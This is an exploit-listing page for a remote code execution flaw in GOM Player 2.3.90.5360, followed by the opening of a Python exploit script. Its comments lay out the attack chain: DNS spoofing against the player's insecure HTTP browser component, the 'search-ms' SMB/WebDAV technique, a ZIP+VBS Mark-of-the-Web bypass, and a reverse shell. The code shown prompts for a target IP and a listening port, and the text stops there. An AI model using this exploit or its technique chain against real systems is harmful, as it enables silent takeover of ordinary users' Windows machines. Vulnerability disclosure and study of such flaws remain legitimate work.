Gom player 2.3.90.5360 remote code execution (rce) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2023-09-08 |
Type : remote |
Platform : windows
This exploit / vulnerability Gom player 2.3.90.5360 remote code execution (rce) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: GOM Player 2.3.90.5360 - Remote Code Execution (RCE)
# Date: 26.08.2023
# Author: M. Akil Gündoğan
# Contact: https://twitter.com/akilgundogan
# Vendor Homepage: https://www.gomlab.com/gomplayer-media-player/
# Software Link: https://cdn.gomlab.com/gretech/player/GOMPLAYERGLOBALSETUP_NEW.EXE
# Version: 2.3.90.5360
# Tested on: Windows 10 Pro x64 22H2 19045.3324
# PoC Video: https://www.youtube.com/watch?v=8d0YUpdPzp8
# Impacts: GOM player has been downloaded 63,952,102 times according to CNET. It is used by millions of people worldwide.
# Vulnerability Description:
# The IE component in the GOM Player's interface uses an insecure HTTP connection. Since IE is vulnerable to the
# SMB/WebDAV+ "search-ms" technique, we can redirect the victim to the page we created with DNS spoofing and execute code on the target.
# In addition, the URL+ZIP+VBS MoTW bypass technique was used to prevent the victim from seeing any warning in the pop-up window.
# Full disclosure, developers should be more careful about software security.
# Exploit Usage: Run it and enter the IP address of the target. Then specify the port to listen to for the reverse shell.
# Some spaghetti and a bad code but it works :)
banner = """\033[38;5;196m+-----------------------------------------------------------+
| GOM Player 2.3.90.5360 - Remote Code Execution |
| Test edildi, sinifta kaldi. Bu oyun hic bitmeyecek :-) |
+-----------------------------------------------------------+\033[0m""" +"""
\033[38;5;117m[*]- Author: M. Akil Gundogan - rootkit.com.tr\n\033[0m"""
import time,os,zipfile,subprocess,socket,sys
print(banner)
if os.geteuid() != 0:
print("You need root privileges to run the exploit, please use sudo...")
sys.exit(1)
targetIP = input("- Target IP address: ")
listenPort = input("- Listening port for Reverse Shell: ")